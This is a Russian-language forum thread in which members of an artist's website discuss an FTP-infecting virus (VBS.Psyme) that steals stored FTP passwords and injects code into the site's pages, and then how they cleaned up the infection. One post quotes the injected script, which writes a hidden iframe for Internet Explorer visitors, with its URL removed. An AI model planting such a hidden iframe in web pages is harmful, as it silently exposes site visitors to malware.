Мой профсайт или "ура, заработало!!!"(с) Опции

[Хольгер]

Посмотрел новые картины -- нравится очень!!!

[Мимохожий__*]

ВАЖНО: ДО ЧАСУ НОЧИ (С 23 НА 24 МАРТА) САЙТ РАБОТАТЬ НЕ БУДЕТ.

Причина: ftp-infector.
Все, кто просматривал что-либо с сайта 22-го вечером и 23-го числа, большая просьба, проверьте технику.

[Мимохожий__*]

А, да. Это я, Гэл.

[Мимохожий__*]

Работает. Вроде бы чисто.

[Аллор]

Гэл, пасиб!
Я тут вне аськи вообще, да и в сеть вылезаю раз в несколько дней... Вот приеду...

[Мимохожий_Гэл_*]

Хм. А чего будет, когда приедешь? Будем "пить по телефону"?

[Аллор]

Хм. А чего будет, когда приедешь? Будем "пить по телефону"?

Может, наконец английской версией займемся...
А пить можно и не потелефону, кста, когда ты в наши края-то?

[Мимохожий__*]

Может, наконец английской версией займемся...
А пить можно и не потелефону, кста, когда ты в наши края-то?

такими темпами скоро придется заниматься переделкой всего и вся снова. Итак, вся та же радость, волна номер два. Работать не будет до воскресенья - пока не доберусь до компа с полным бэкапом.

ps: Эол, Вы не могли бы сменить пароль? И выяснить заодно, кто сделал аплоад - дело в том, что я в начале недели не зря все снес, эту заразку (вирус то есть) хлебом не корми - дай пихнуть в html или php свой фрейм. А так как кто-то все перезалил - оно, понятное дело, появилось снова. Поэтому удаляю все во второй раз и надеюсь, что такого больше не случится - по крайней мере, пока я не почищу ВСЕ, что там может быть "infected".

[Темный Эол]

Пароль сменить разумеется можно. А выяснять ничего не надо. Аплоад сделал я. Просто увидел что сайт отстствует, ну и залил тот бэкап, который у меня был. Прошу прощения, я поторопился, сначала надо было у вас спросить. А чего там заражено то было? Я сайт посмотрел и ничего такого не увидел.

[Мимохожий__*]

Пароль сменить разумеется можно. А выяснять ничего не надо. Аплоад сделал я. Просто увидел что сайт отстствует, ну и залил тот бэкап, который у меня был. Прошу прощения, я поторопился, сначала надо было у вас спросить. А чего там заражено то было? Я сайт посмотрел и ничего такого не увидел.

Вирус: DrWeb опознал как VBS.Psyme (точнее не помню, но скорее всего 206 какой-нибудь)
Распространение: при открытии страницы посредством IE сохраняется в Temporary Internet Files; определяет доступные ftp аккаунты - из far, total commander и прочих файл-манагеров. Cоответственно, втихую копирует продукты своей жизнедеятельности туда, заражая .php и .html файлы. Собственно, он дописывает в конец файла вот это вот:

<!--start_frame0xf--//>
<script type="text/javascript">if (navigator.userAgent.indexOf('MSIE') != -1) { document.writeln('<iframe
src="##########/index.php" frameborder=0 border=0 width=0 height=0 style="position: absolute; visibility: hidden"></iframe>');
}</script>
<!--end_frame0xf--//>

где тема с "#########/index.php" - (я намеренно прибил ссылку) видимо, система распространения вируса и есть.

Отслеживание: DRWeb начиная с версии 4.33 (с нормальной лицензионной базой) - точно.

Дополнение: он обходит рекурсивно все доступные каталоги. Так что "обсижен" им не только сам сайт, но и все "системные" фолдеры, где попадались файлы с указанным расширением. В первый раз я сливал на локал все и на локале же чистил - ну, дома проще, дома Sabayon стоит. Помогло. Сейчас, видимо, нужно будет либо скрипт писать либо так же, как и в первый раз, поступать.

[Темный Эол]

Спасибо за пояснения. Не могли бы вы пояснить еще немножко? Я так понял что 24 марта вы почистили сайт от вируса и он стал работать нормально, так? А потом что, он опять появился и вы убрали все html странички?

А меня значит спасло то что я на сайт ходил фаерфоксом. Проверился сейчас симантеком, он ничего не нашел. Нет, ну что за свинское счастье, оказывается я скачал себе бэкап содержащий вирус. Сейчас посмотрел, во всех файлах есть указанный вами код. Я могу стереть его и залить обратно чистый бэкап. Будет ли этого достаточно? И нужна ли вообще моя помощь?

[Мимохожий__*]

Спасибо за пояснения. Не могли бы вы пояснить еще немножко? Я так понял что 24 марта вы почистили сайт от вируса и он стал работать нормально, так? А потом что, он опять появился и вы убрали все html странички?

Именно. Кроме тех, которые не в public_html. Но их тоже чистить надо. А для того, чтобы вычистить все прочие сайты, на которые у меня был доступ по работе, писали скрипт, предварительно сменив пароли.

А меня значит спасло то что я на сайт ходил фаерфоксом.

из-за - navigator.userAgent.indexOf('MSIE') != -1 - видимо, да.

Проверился сейчас симантеком, он ничего не нашел.

Ну, антивирусы всякие бывают. С чего ради, кстати, вирус у вас на машине должен быть? Пароль он один раз (24 марта) отловил, куда надо - заслал, так что без всякого постороннего участия... Хм... А на моем рабочем компе дырывеб тоже ничего не нашел. Хотя 24 марта - находил результативно.

Нет, ну что за свинское счастье, оказывается я скачал себе бэкап содержащий вирус.

Не факт. Он просто прошелся по незагаженным файлам, и все.

Сейчас посмотрел, во всех файлах есть указанный вами код. Я могу стереть его и залить обратно чистый бэкап. Будет ли этого достаточно? И нужна ли вообще моя помощь?

Нет, не будет. Нужно выкусать все html (htm) и php и проверить каждый. А потом перезалить - с корня начиная (на всякий случай). Что, собственно, я и собираюсь делать на выходных - если сеть будет. Но помощи буду всяко рад.

[Темный Эол]

Сменил пароль, все html (htm) и php файлы очистил и залил по новой. Теперь лучше?

[Аллор]

Вроде оно все открывается! пасиб вам!

[Аллор]

Не удивляйтесь, это просто мой заказчик не может аттач открыть, так я ресурс форума в личных целЯх юзаю...
*сие моя халтура, еще не доделанная...*

Эскизы прикрепленных изображений